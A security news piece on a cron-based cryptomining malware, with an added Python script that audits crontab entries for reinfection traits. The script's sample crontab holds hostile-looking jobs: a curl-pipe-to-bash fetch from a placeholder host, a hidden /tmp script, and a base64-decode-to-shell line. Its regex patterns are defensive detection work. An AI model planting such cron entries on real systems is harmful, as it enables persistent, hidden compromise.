- The malware infects web servers and maximizes CPU usage while mining cryptocurrency.
- It uses cron commands to maintain persistence on the system even if all the malicious files and processes are removed.
Security researchers have spotted a cryptomining malware that leverages the cron scheduler. Researchers from the security firm Sucuri analyzed a Bash script linked to the malware, which downloads its payload and configuration files onto the system.
They found that the script terminates other cryptomining processes on the infected system before running its own, and uses cron commands to evade detection and to reinfect the host.
How does it work?
- The malware infects web servers and starts cryptomining processes that maximize CPU usage.
- The malicious payload is downloaded by a Bash script named 'cr2.sh'.
- The script kills any process associated with cryptomining, including those of xmrig and cryptonight, among others. It also performs other operations, such as identifying the OS environment (32- or 64-bit) in order to download the appropriate payload.
- The script downloads a configuration file and a cryptominer payload.
- If the script is detected, cron commands are executed to kill it and download it again. This is how the malware establishes persistence on the system without being easily detected.
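The defensive counterpart to the behaviour above is to audit cron entries themselves, not only the dropped files. The following is an added example, not code from the report or from Sucuri; it parses crontab-format lines and flags jobs with reinfection traits (fetch-and-run pipelines, temp-directory paths, runtime decoding, silenced output, or the script name the report mentions). The sample crontab, the URL and the paths in it are constructed placeholders.

```python
import re

# Constructed sample in /etc/cron.d format (schedule, user, command); the URL
# and paths are placeholders, not indicators taken from the report.
SAMPLE_CRON = """\
# m h dom mon dow user  command
17 *  * * *  root      cd / && run-parts --report /etc/cron.hourly
0 3   * * *  backup    /usr/local/bin/backup.sh >> /var/log/backup.log 2>&1
*/5 * * * *  www-data  curl -fsSL http://EXAMPLE-PLACEHOLDER/cr2.sh | bash
* * * * *    root      /tmp/.x/cr2.sh >/dev/null 2>&1
@reboot      root      echo cHJpbnQgaGk= | base64 -d | sh
"""

# Traits of a reinfecting cron job: fetch-and-run, hidden in a temp dir,
# decoded at run time, output silenced, or the script name from the report.
SUSPICIOUS = [
    ("download-and-execute", re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")),
    ("runs-from-temp-dir", re.compile(r"(^|\s)(/tmp|/dev/shm|/var/tmp)/")),
    ("decodes-payload", re.compile(r"base64\s+(-d|--decode)\b")),
    ("output-silenced", re.compile(r">\s*/dev/null\s+2>&1")),
    ("known-script-name", re.compile(r"\bcr2\.sh\b")),
]

def parse_entry(line, system_format=True):
    """Split a crontab line into (schedule, user, command); None if not a job."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"^\w+\s*=", line):
        return None                               # comment, blank or VAR=value
    n_sched = 1 if line.startswith("@") else 5    # @reboot etc. vs 5 fields
    n_user = 1 if system_format else 0            # per-user crontabs lack a user column
    parts = line.split(None, n_sched + n_user)
    if len(parts) != n_sched + n_user + 1:
        return None
    user = parts[n_sched] if system_format else None
    return " ".join(parts[:n_sched]), user, parts[-1]

def audit_cron(text, system_format=True):
    """Return one dict per job whose command matches any indicator."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        entry = parse_entry(line, system_format)
        if entry is None:
            continue
        schedule, user, command = entry
        reasons = [name for name, rx in SUSPICIOUS if rx.search(command)]
        if reasons:
            findings.append({"line": no, "schedule": schedule, "user": user,
                             "command": command, "reasons": reasons})
    return findings
```

On a live host, feed it the contents of /etc/crontab, each file under /etc/cron.d, and each user's crontab (with `system_format=False` for the latter); the review is read-only, and removing the cron job before the dropped files is what stops the reinfection loop.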
Sucuri researchers note that the malware affects desktop installations in addition to web servers, and advise users to watch for malicious cron processes.
“If you overlook a malicious cronjob, it can reinfect your environment until it’s mitigated. It’s also important to remember that it’s not just web servers that are targeted — it can also infect desktop installations of 32/64bit Linux systems and other variants, which are used to infect Windows installations,” the researchers explained.